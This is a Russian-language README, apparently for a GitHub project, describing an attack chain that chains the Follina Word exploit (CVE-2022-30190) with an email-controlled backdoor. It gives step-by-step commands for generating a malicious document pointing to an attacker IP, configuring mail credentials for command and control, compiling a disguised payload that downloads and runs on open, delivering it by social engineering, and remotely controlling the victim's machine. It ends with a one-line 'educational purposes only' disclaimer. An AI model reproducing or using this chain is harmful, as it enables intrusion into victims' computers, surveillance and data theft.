AmzWord
автоматизированная цепочка атак на основе CVE-2022-30190, почтового бэкдора 163 и стеганографии изображений
Благодарим следующие репозитории GitHub, код которых мы использовали и модифицировали для интеграции и реализации нашей работы:
Русская версия README смотрите здесь
Требования
gdog:
- Python 2.7
- модуль PyCrypto
- модуль WMI
- модуль Enum34
- модуль Netifaces
follina:
Использование и процесс атаки
-
Используйте follina.py для создания вредоносного файла Word и включения HTTP-прослушивания.
- Вы можете изменить имя по умолчанию и IP-адрес по умолчанию в коде.
- Вы также можете указать их с помощью
--ip и --output.
- Подробное использование см. в follina. Мы не меняли интерфейс использования.
- пример:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
Измените client.py и gdog.py в gdog и заполните следующую информацию:
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
Скомпилируйте client.py в tar.exe и поместите его в /follina/www
-
Используйте любой метод социальной инженерии, чтобы отправить его цели. Как только жертва откроет Word, tar.exe будет автоматически загружен и выполнен.
-
Атакующий запускает gdog локально и отправляет команды для управления целевой машиной. См. gdog для использования.
Примечание
- Это всего лишь демонстрация реализации цепочки атак. Запущенный exe-файл можно даже найти в диспетчере задач, что упрощает наблюдение за эффектом. Мы не выполняли никаких операций, таких как антивирус, скрытие и повышение привилегий. Конечно, на Windows это несложно, не так ли?
- Проект gdog существует уже давно, и мы приложили немало усилий, чтобы заставить его работать. Команды удаленного управления, которые в настоящее время подтверждены, включают: выполнение команд, создание скриншотов, всплывающие окна, выключение, блокировка экрана и передача файлов. Этих функций достаточно для большинства нужд.
- Не знаю почему, но, похоже, есть проблема с поиском по SUBJECT в IMAP. Мы не можем найти письма с нужной темой, возвращаемое значение пусто. Мы можем применить другие методы, например, читать все непрочитанные письма, отфильтровывать нужные, а затем помечать остальные как непрочитанные. Это может вызвать проблемы при большом количестве контролируемых пользователей, и это нужно решить.
- Этот проект предназначен только для учебных и ознакомительных целей.